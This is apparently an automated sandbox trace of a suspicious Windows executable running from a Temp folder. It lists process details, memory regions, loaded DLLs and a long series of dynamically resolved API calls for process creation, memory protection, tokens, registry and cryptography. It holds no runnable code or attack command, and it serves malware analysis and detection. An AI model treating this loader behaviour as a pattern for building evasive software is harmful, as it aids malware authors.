CloseHandle (hObject=0x48) returned 1 [0099.286] CloseHandle (hObject=0x4c) returned 1 [0099.286] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.287] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 
[0099.287] ExitProcess (uExitCode=0x0) Process: id = "20" image_name = "yaqb5zg8.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe" page_root = "0x7ea16800" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0xb58" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1344 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1345 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1346 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1347 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1348 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1349 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 
"c:\\windows\\system32\\apisetschema.dll") Region: id = 1350 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1351 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1352 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1363 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1364 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1365 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1366 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1367 start_va = 0x710000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1368 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1369 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1370 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: 
"c:\\windows\\system32\\shell32.dll") Region: id = 1371 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1372 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1373 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1374 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1375 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1376 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1377 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1378 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1379 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = 
"\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1380 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1381 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1382 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1383 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1384 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1385 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1386 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1387 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1388 start_va = 0x810000 end_va = 0x140ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1389 start_va = 0x1410000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 1390 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = 
mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1391 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1392 start_va = 0x1550000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1393 start_va = 0x1700000 end_va = 0x19cefff entry_point = 0x1700000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1394 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1395 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1396 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x2a0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1397 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1398 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1399 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1400 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file 
name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1401 start_va = 0x1550000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1402 start_va = 0x16c0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 1403 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1404 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1405 start_va = 0x1550000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1406 start_va = 0x1680000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 1407 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1408 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 27 os_tid = 0xbc0 [0097.991] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0097.991] GetProcAddress (hModule=0x76910000, 
lpProcName="VirtualQueryEx") returned 0x76944e42 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0097.991] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0097.992] GetProcAddress 
(hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0097.992] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0097.993] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0097.994] 
GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0097.994] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0097.995] GetProcAddress (hModule=0x76910000, 
lpProcName="GetCPInfoExW") returned 0x76948b1b [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0097.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0097.996] 
GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0097.996] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0097.996] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0097.996] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0097.997] GetProcAddress (hModule=0x76910000, 
lpProcName="GetLocaleInfoW") returned 0x76966596 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0097.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0097.998] 
GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0097.998] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0097.998] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0097.998] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0097.999] GetProcAddress (hModule=0x769f0000, 
lpProcName="OpenProcessToken") returned 0x76a04304 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0097.999] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0097.999] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0097.999] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0097.999] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0097.999] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0098.000] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0098.000] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0098.000] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0098.000] GetProcAddress (hModule=0x76750000, 
lpProcName="CoInitialize") returned 0x7676b636 [0098.000] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0098.000] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0098.000] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0098.000] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0098.000] 